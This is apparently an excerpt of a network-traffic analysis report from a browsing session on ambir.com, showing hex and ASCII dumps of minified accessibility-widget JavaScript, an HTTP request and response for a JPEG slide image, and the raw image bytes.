                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 74 74 65 72 6e 3a 5b 22 2f 5e 28 3f 21 2e 2a 76 5c 5c 64 2b 5c 5c 2e 5c 5c 64 2b 5c 5c 2e 5c 5c 64 2b 29 2e 2a 2f 22 5d 7d 29 2c 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 33 30 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 61 72 20 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 76 61 6c 75 65 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 2c 69 3d 74 26 26 65 5b 74 5d 2c 6e 3d 30 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 65 29 3b 69 66 28 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 7b 6e 65 78
                                                                                                                                                                                              Data Ascii: ttern:["/^(?!.*v\\d+\\.\\d+\\.\\d+).*/"]}),(()=>{"use strict";var e={301:function(e,t,i){var n=this&&this.__values||function(e){var t="function"==typeof Symbol&&Symbol.iterator,i=t&&e[t],n=0;if(i)return i.call(e);if(e&&"number"==typeof e.length)return{nex
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 64 2e 6e 65 78 74 28 29 3b 21 75 2e 64 6f 6e 65 3b 75 3d 64 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 68 3d 75 2e 76 61 6c 75 65 3b 65 2e 70 75 72 69 66 79 49 66 72 61 6d 65 57 69 6e 64 6f 77 28 68 29 7d 7d 63 61 74 63 68 28 65 29 7b 61 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 75 26 26 21 75 2e 64 6f 6e 65 26 26 28 6f 3d 64 2e 72 65 74 75 72 6e 29 26 26 6f 2e 63 61 6c 6c 28 64 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 61 29 74 68 72 6f 77 20 61 2e 65 72 72 6f 72 7d 7d 65 2e 6f 62 73 65 72 76 65 72 2e 6f 62 73 65 72 76 65 28 74 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 7b 63 68 69 6c 64 4c 69 73 74 3a 21 30 2c 73 75 62 74 72 65 65 3a 21 30 7d 29 7d 72 65 74 75 72 6e 20 65 2e 70 75 72 69 66 79 49 66 72 61 6d 65 57 69 6e 64 6f 77 3d
                                                                                                                                                                                              Data Ascii: d.next();!u.done;u=d.next()){var h=u.value;e.purifyIframeWindow(h)}}catch(e){a={error:e}}finally{try{u&&!u.done&&(o=d.return)&&o.call(d)}finally{if(a)throw a.error}}e.observer.observe(t.document.body,{childList:!0,subtree:!0})}return e.purifyIframeWindow=
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 6e 74 73 5b 74 5d 3b 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 7d 7d 63 61 74 63 68 28 65 29 7b 73 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 75 26 26 21 75 2e 64 6f 6e 65 26 26 28 61 3d 64 2e 72 65 74 75 72 6e 29 26 26 61 2e 63 61 6c 6c 28 64 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 73 2e 65 72 72 6f 72 7d 7d 7d 2c 65 78 74 65 6e 64 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 6f 2c 72 2c 6c 3d 69 2e 72 65 66 2c 63 3d 69 2e 74 61 72 67 65 74 52 65 66 2c 64 3d 74 2e 6e 61 6d 65 73 2c 75 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 2c 68 3d 74 2e 70 6f 73 74 4d 65 74 68 6f 64 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 5b 75 5d 5b 65 2e 50 72 65 66 69 78 2b 74
                                                                                                                                                                                              Data Ascii: nts[t];c.apply(this,e)}}}catch(e){s={error:e}}finally{try{u&&!u.done&&(a=d.return)&&a.call(d)}finally{if(s)throw s.error}}},extendObject:function(t,i){var o,r,l=i.ref,c=i.targetRef,d=t.names,u=t.constructorName,h=t.postMethod,p=function(t){c[u][e.Prefix+t
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 57 69 74 68 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 6f 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 57 69 6e 64 6f 77 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 57 69 74 68 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 6f 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 2e 72 65
                                                                                                                                                                                              Data Ascii: Strategies.extendPrototypeWithImplementation,implementation:o.EventDelegator.addEventListener},{names:["removeEventListener"],constructorName:"Window",replaceStrategy:e.ReplaceStrategies.extendPrototypeWithImplementation,implementation:o.EventDelegator.re
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 6e 74 45 6c 65 6d 65 6e 74 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 4e 6f 64 65 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 72 65 64 75 63 65 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 41 72 72 61 79 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 74 6f 74 79 70 65 7d 2c 7b 6e 61 6d 65 73 3a 5b 22 6b 65 79 73 22 2c 22 76 61 6c 75 65 73 22 5d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 4e 61 6d 65 3a 22 4f 62 6a 65 63 74 22 2c 70 6f 73 74 4d 65 74 68 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                              Data Ascii: ntElement"],constructorName:"Node",replaceStrategy:e.ReplaceStrategies.extendPrototype},{names:["reduce"],constructorName:"Array",replaceStrategy:e.ReplaceStrategies.extendPrototype},{names:["keys","values"],constructorName:"Object",postMethod:function(e)
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 22 77 69 6e 64 6f 77 22 2c 72 65 70 6c 61 63 65 53 74 72 61 74 65 67 79 3a 65 2e 52 65 70 6c 61 63 65 53 74 72 61 74 65 67 69 65 73 2e 65 78 74 65 6e 64 50 72 6f 70 65 72 74 79 7d 5d 2c 65 2e 6f 62 73 65 72 76 65 72 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 73 2c 61 2c 6f 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 72 3d 6e 28 74 29 2c 6c 3d 72 2e 6e 65 78 74 28 29 3b 21 6c 2e 64 6f 6e 65 3b 6c 3d 72 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 63 3d 6c 2e 76 61 6c 75 65 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 64 3d 28 61 3d 76 6f 69 64 20 30 2c 6e 28 63 2e 61 64 64 65 64 4e 6f 64 65 73 29 29 2c 75 3d 64 2e 6e 65 78 74 28 29 3b 21 75 2e 64 6f 6e 65 3b 75 3d 64 2e 6e 65 78 74 28 29 29 7b
                                                                                                                                                                                              Data Ascii: "window",replaceStrategy:e.ReplaceStrategies.extendProperty}],e.observer=new MutationObserver((function(t){var i,s,a,o;try{for(var r=n(t),l=r.next();!l.done;l=r.next()){var c=l.value;try{for(var d=(a=void 0,n(c.addedNodes)),u=d.next();!u.done;u=d.next()){
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 2c 73 29 29 2c 6e 5b 73 5d 3d 74 5b 73 5d 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 29 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 3d 76 6f 69 64 20 30 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 72 65 74 75 72 6e 20 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 2c 6f 2c 72 2c 6c 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 63 3d 69 28 65 2e 65 76 65 6e 74 73 29 2c 64 3d 63 2e 6e 65 78 74 28 29 3b 21 64
                                                                                                                                                                                              Data Ascii: ,s)),n[s]=t[s]);return e.concat(n||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0}),t.EventDelegator=void 0;var a=function(){function e(){}return e.handleEvent=function(t){var a,o,r,l;try{for(var c=i(e.events),d=c.next();!d
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 74 7d 29 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 29 29 7d 7d 2c 65 2e 65 76 65 6e 74 73 3d 5b 7b 7d 2c 7b 7d 5d 2c 65 2e 61 63 74 69 76 65 4c 69 73 74 65 6e 65 72 73 3d 5b 5d 2c 65 2e 6e 6f 6e 42 75 62 62 6c 69 6e 67 45 76 65 6e 74 73 3d 5b 22 66 6f 63 75 73 22 2c 22 62 6c 75 72 22 2c 22 66 6f 63 75 73 69 6e 22 2c 22 66 6f 63 75 73 6f 75 74 22 2c 22 63 68 61 6e 67 65 22 5d 2c 65 7d 28 29 3b 74 2e 45 76 65 6e 74 44 65 6c 65 67 61 74 6f 72 3d 61 7d 7d 2c 74 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 76 61 72 20 73 3d 74 5b 6e 5d 3b
                                                                                                                                                                                              Data Ascii: ((function(e){return e!==t})),document.removeEventListener(t,e.handleEvent,{capture:!0})))}},e.events=[{},{}],e.activeListeners=[],e.nonBubblingEvents=["focus","blur","focusin","focusout","change"],e}();t.EventDelegator=a}},t={};!function i(n){var s=t[n];
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 65 61 64 65 72 20 6d 6f 64 65 20 69 73 20 6f 6e 2c 20 61 6c 74 2b 38 20 74 6f 20 63 61 6e 63 65 6c 22 2c 44 45 4c 45 54 45 44 5f 4e 55 4d 42 45 52 3a 22 57 61 73 22 2c 41 43 43 4f 55 4e 54 3a 22 41 63 63 6f 75 6e 74 22 2c 53 43 52 4f 4c 4c 3a 22 53 63 72 6f 6c 6c 20 50 61 67 65 22 2c 53 45 41 52 43 48 3a 22 53 65 61 72 63 68 22 2c 4f 52 44 45 52 3a 22 4f 72 64 65 72 22 2c 53 55 42 4d 49 54 3a 22 53 75 62 6d 69 74 22 2c 54 49 4d 45 5f 54 4f 5f 41 4c 45 52 54 5f 43 4c 4f 53 45 3a 22 53 65 63 6f 6e 64 73 20 75 6e 74 69 6c 20 63 6c 6f 73 69 6e 67 22 2c 4d 41 49 4e 5f 4d 45 4e 55 3a 22 4d 61 69 6e 20 4d 65 6e 75 22 2c 46 4f 4f 54 45 52 5f 4d 45 4e 55 3a 22 46 6f 6f 74 65 72 20 4d 65 6e 75 22 2c 48 45 41 44 45 52 5f 4d 45 4e 55 3a 22 48 65 61 64 65 72 20 4d 65
                                                                                                                                                                                              Data Ascii: eader mode is on, alt+8 to cancel",DELETED_NUMBER:"Was",ACCOUNT:"Account",SCROLL:"Scroll Page",SEARCH:"Search",ORDER:"Order",SUBMIT:"Submit",TIME_TO_ALERT_CLOSE:"Seconds until closing",MAIN_MENU:"Main Menu",FOOTER_MENU:"Footer Menu",HEADER_MENU:"Header Me


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              109192.168.2.549860141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC1642OUTGET /wp-content/uploads/2023/08/slide2-1024x603.jpg HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:31 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 78918
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=79685
                                                                                                                                                                                              ETag: "66c6198e-13745"
                                                                                                                                                                                              Last-Modified: Wed, 21 Aug 2024 16:45:02 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10825
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fd65f3c8c12-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:31 UTC890INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 84 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0e 09 09 08 08 09 12 0d 0d 0a 0e 15 12 16 16 15 12 14 14 17 1a 21 1c 17 18 1f 19 14 14 1d 27 1d 1f 22 23 25 25 25 16 1c 29 2c 28 24 2b 21 24 25 24 01 06 06 06 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 ff c2 00 11 08 02 5b 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 00 07 08 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 ae 56 e4 b9 79 a8 37 20 d0 65 51 72
                                                                                                                                                                                              Data Ascii: JFIF``!'"#%%%),($+!$%$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$["5Vy7 eQr
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: c9 bb 65 8e d8 d9 5f 8b 8c cc ba 4c 22 11 a8 c2 20 d3 9a 61 90 64 73 5e 9b 41 20 12 89 de d7 a7 f5 5b 5c 8a 8e 45 68 2f 37 81 ca c4 4c 88 d5 88 ac e4 4d 5e c5 43 db ca c6 71 10 19 cf 44 73 9a 80 e6 3b 86 3e 7b 42 37 95 6c be 74 b2 b9 4b 5e fb a1 3f 77 e5 31 43 ea bd 2f cb 3e b1 45 9a 6a e9 d1 2b 98 9a 4e 52 62 1f 93 11 15 62 d8 23 a2 61 7b 4b 16 61 91 03 88 e6 a1 cd e7 26 d2 29 10 c7 39 c9 a1 79 c8 6b 8d c0 e2 77 98 ca 3a d0 7c 9f 3f a1 97 de f1 98 da 9b 23 b0 b2 f3 c6 4e 1f 41 fa 37 c4 fe d1 9a ff 00 70 8c 66 73 f4 c3 0c 86 39 45 64 a1 22 b9 87 1b 63 19 d8 00 64 90 d9 18 c2 3b 64 a0 36 43 23 28 ad 93 1d 8e 43 16 70 84 67 2b 18 92 18 d4 75 33 1c 5a c9 0c 9c 11 5a 49 c4 1c f6 b2 20 e4 45 ae 6a 37 72 1a f1 a4 5b 1c d7 42 6a 8e e4 d9 b1 ca ea 2c af c7 c4 56
                                                                                                                                                                                              Data Ascii: e_L" ads^A [\Eh/7LM^CqDs;>{B7ltK^?w1C/>Ej+NRbb#a{Ka&)9ykw:|?#NA7pfs9Ed"cd;d6C#(Cpg+u3ZZI Ej7r[Bj,V
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 15 af 89 62 d3 82 63 8e 13 26 a1 30 81 ec e1 ca 3e d2 42 c8 e7 5d 5d d7 21 1d 3a 5d f0 51 f5 d0 59 5c 49 ac 10 03 21 96 c2 2b 94 2c 90 ea b0 57 2b f5 ce ac 27 a2 76 7c d1 7a 1f 61 f2 5f 4c e9 f3 44 79 4b bf 14 58 76 95 f6 c2 ba 19 9d 35 e2 18 0f a4 fc 03 95 d7 c8 5c 3e 64 09 fb df 2b d9 57 67 97 d4 5f 5e 69 cf 61 6d 49 a3 e6 f5 f3 e2 f7 11 67 b7 c5 fd aa 82 ae fc 1a df 0f a5 cb f5 39 b7 71 e1 5a 74 b2 af b9 f8 d5 85 95 fd 03 23 ce 3d 1f ce 75 de 51 2e 5b 8c ac 20 95 e3 7a 1c f6 2a 6e 73 51 22 b7 91 b7 79 fe f9 a4 fc 3d 7d b6 9e 56 79 dc a6 b6 3a 9b ab ca 8f d5 f9 8d 93 e0 c7 ee 71 ef db 99 ae be ad ac cc 5d b6 0d 57 56 55 4b e0 bd 4e 86 7e 58 d1 b1 be 73 ec 58 05 2f 3c bb 65 6d 86 b2 66 32 ce b8 d8 d3 5c 59 87 9e c4 d1 66 35 d0 39 55 55 3d 0c 56 99 3b 69
                                                                                                                                                                                              Data Ascii: bc&0>B]]!:]QY\I!+,W+'v|za_LDyKXv5\>d+Wg_^iamIg9qZt#=uQ.[ z*nsQ"y=}Vy:q]WVUKN~XsX/<emf2\Yf59UU=V;i
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 78 f4 7b 79 3b 91 c8 a0 32 0d 81 20 d1 64 08 83 73 d3 61 64 1a bb 62 ca 81 47 56 bd 2e 66 27 74 73 a5 3d ad 77 ba f1 83 a6 b0 87 6d 70 c6 58 fb 73 42 c8 da 45 4a de 7c 39 74 68 33 d8 bd 5e 6c 8b 6a 83 d1 6e d8 e6 af f9 87 d0 e2 4a 04 bc fa aa 01 22 be ab ba 13 87 65 50 e2 5f 46 23 e4 da aa 8b 9d bc ec d7 a4 f9 ef b0 45 68 32 b6 33 b0 6a c8 f9 c6 cb 2f d4 c5 b8 9d 59 60 a5 75 6f 41 a2 b6 98 a3 2b 72 da a8 a3 40 a3 1d 10 22 b1 63 20 30 e2 4e 74 1b 3a bb a1 82 93 12 4d d2 1b 9a e0 ab 20 89 09 4d 45 4b 62 77 09 e9 a2 b5 50 36 b9 b6 2f a5 7a dd bb 79 95 5d 68 d1 57 2d 87 35 01 f3 12 c8 c7 74 84 b6 b8 e9 20 37 54 36 11 b3 88 d8 56 b0 4d 20 da 10 cc 27 11 47 92 11 01 cc 03 73 4b 4c 18 cb 59 9b 86 c8 cb ce 37 72 c7 45 be dd 6d f3 d4 c8 1e dd f2 97 a6 f9 05 76 62
                                                                                                                                                                                              Data Ascii: x{y;2 dsadbGV.f'ts=wmpXsBEJ|9th3^ljnJ"eP_F#Eh23j/Y`uoA+r@"c 0Nt:M MEKbwP6/zy]hW-5t 7T6VM 'GsKLY7rEmvb
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 27 a0 f3 c3 47 a3 18 c2 34 43 69 1a 80 b0 a3 00 88 a2 18 c4 41 26 c0 90 28 60 9c 04 d1 9c 34 f9 ac 60 dc c6 35 32 35 8a 0e 20 9d 38 cb 97 02 6d f5 4c 30 8d 6d 4a 8f 52 3f 26 d6 e9 b3 9c de 8c 7d 96 3b 57 38 49 70 a4 57 68 e9 ae 6a e5 0e 74 a5 74 a4 87 4a ae fa 8b f8 70 99 f5 a9 c4 7b 6a 7a aa b4 34 23 24 99 5f 63 5a e2 1e 1a c6 4e b2 aa b4 aa cd 07 77 64 bd a8 e4 4d 88 e4 06 c4 97 cc f9 53 27 ef 5e 75 dd e7 e7 2d 48 b6 d6 2a f9 4d 92 63 9f c0 70 99 76 65 86 92 92 ea e0 2d cb ee a6 2d cd 31 f5 64 dc 48 ae d0 fc bf df 4c d0 bb ce a7 0c 6d 56 37 da fd 57 06 58 4f 06 fa 4d 96 d1 65 34 56 57 c5 8d 75 77 03 8f 2b 5e 60 4b 88 fc 7a 76 ae 41 7c eb d9 47 ee 7d 56 0c 25 15 72 44 6b 10 78 99 4a fd 99 76 bd 86 8b a6 9f 69 c2 64 60 d9 09 c6 a7 b8 cf b4 2e e4 cd 7d 71
                                                                                                                                                                                              Data Ascii: 'G4CiA&(`4`525 8mL0mJR?&};W8IpWhjttJp{jz4#$_cZNwdMS'^u-H*Mcpve--1dHLmV7WXOMe4VWuw+^`KzvA|G}V%rDkxJvid`.}q
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 21 12 ba 2e 35 1c 98 5c fd 57 99 fb 3c f6 1d 65 08 ed a3 26 33 83 83 50 c1 ca 23 cd 6f 49 04 6f 6d 95 c6 b1 a5 f4 4c 1b 3d d7 ca fd 5b c9 f9 bb ab 55 ab 2b 23 8a 40 1b 8e a8 e8 39 b1 e5 02 41 82 61 32 3c a0 49 04 69 04 8f b3 1a ac f4 9e 71 19 c0 69 c2 60 06 61 80 4c 2f 8d 7a cd 2d 53 f0 3c 87 a6 f9 d7 3f 5c 5e 56 83 91 50 11 ec 70 73 9a e0 51 9c 60 d6 b9 40 2a bc 1d ed 9e 27 7b 25 ef 56 35 d6 5b f2 4d 28 89 a2 a5 ee 42 29 f3 6f d2 3e 09 9e ec 82 3d 99 ef 29 80 59 d7 21 cc 91 16 b2 63 48 4e 4c 88 e6 84 e4 47 1d 6a 8d 67 d0 1f 3c 7b fb 94 a6 c7 e4 e5 b2 2d 3a 7b 20 f8 f6 76 32 fb 4a f7 19 ac aa 44 7c 77 a6 7e 1f 20 88 2e 4c bc 2e 11 78 48 06 40 a3 0c c0 c2 09 e9 4c 26 79 5e 53 41 97 f4 3c b8 c2 30 ac 88 43 a2 d0 51 73 74 75 e2 21 3a 86 cf ce ec 8d 65 39 64
                                                                                                                                                                                              Data Ascii: !.5\W<e&3P#oIomL=[U+#@9Aa2<Iiqi`aL/z-S<?\^VPpsQ`@*'{%V5[M(B)o>=)Y!cHNLGjg<{-:{ v2JD|w~ .L.xH@L&y^SA<0CQstu!:e9d
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 66 40 f8 fa b8 7f 5e e4 fc 1f 57 28 ed f5 9e 63 a4 47 a6 3f 5f 22 9b 29 6c e8 3c 5d 3b dc 0b 2d d3 6d 30 dc 0c 05 d2 a9 e6 87 61 12 4a 5f a8 79 e7 bb 42 ca 68 fe c6 95 59 e3 90 3d c5 81 e5 57 1b be b6 9c 1b 77 ac 9c 31 32 35 20 b6 1e 15 f3 b7 b8 f8 87 a1 e3 3f 55 89 d7 39 58 b8 4f d5 46 c3 29 b3 c9 e7 b6 0b 2c 47 8b 64 1f 5f f3 ef 5a f2 fe 8a 27 99 7a 3e 5f 85 dd f3 78 57 94 dd 8e 54 28 76 70 b4 e5 97 98 e0 fa 3f 3a ae 47 51 69 b4 14 b7 fa 29 9b 06 6d 6c d5 20 1e 3e 7e a4 2b 16 0f 49 00 76 5d 0c 35 57 d9 09 63 d4 3a 98 da 73 d6 ee 3c c6 d7 93 d2 fa b3 c6 3d 47 cb 39 1d 40 2b 48 5d 14 05 00 0c 82 24 59 98 e6 49 15 58 e0 19 40 f9 29 24 09 21 2f af 82 40 fa 8f 33 1e 0c b8 21 16 29 a2 82 31 06 9b d8 c6 a0 8a 25 64 a9 30 a4 4a 33 4d 1a 44 e0 4c 56 d6 1b 5f 37
                                                                                                                                                                                              Data Ascii: f@^W(cG?_")l<];-m0aJ_yBhY=Ww125 ?U9XOF),Gd_Z'z>_xWT(vp?:GQi)ml >~+Iv]5Wc:s<=G9@+H]$YIX@)$!/@3!)1%d0J3MDLV_7
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 13 d1 d1 93 98 44 90 ab ce 43 44 a9 24 a4 19 22 fe a5 49 43 f5 9e 52 3c 59 91 61 64 18 d2 e3 46 40 61 5b 09 0f 9f c9 b3 9e 8d 73 ba c9 38 36 57 53 f3 dd 0e c8 69 9a ff 00 90 f3 fa cc a4 24 9c bc 0c d4 e6 94 3d 3b a9 ee 41 1c 9c 16 f7 b8 cb 50 d2 58 d0 b8 1f 10 4d 07 a3 54 14 ad c7 85 9f 8e 40 08 7d cf b9 f9 27 eb 2a e7 25 5a e7 14 e5 e0 4e 5e 04 47 70 35 57 81 39 78 6d 55 40 ee e5 42 2f 70 72 39 06 88 e4 04 47 20 37 95 04 9c a8 08 8e 44 fc eb e2 9f ab fe 49 ea 62 2e 9f 25 69 6c 3e 98 e0 3b 4d 1d 4d 68 24 f2 3e 6f eb f8 98 4f cb c1 a6 a6 a2 d1 ca a9 4a e7 79 26 86 d3 5e 7b 6b 30 5b db 06 ca 46 cc c4 d6 6e 01 4c b0 a2 da 44 cd 76 51 fa ca 9a 6c af ee 4c f6 5b 4c b6 83 5c fe 91 91 10 99 35 cb e6 39 ae 73 3a 51 25 7c 95 9c 47 28 04 92 ea fb 18 a9 d1 61 bd 2a
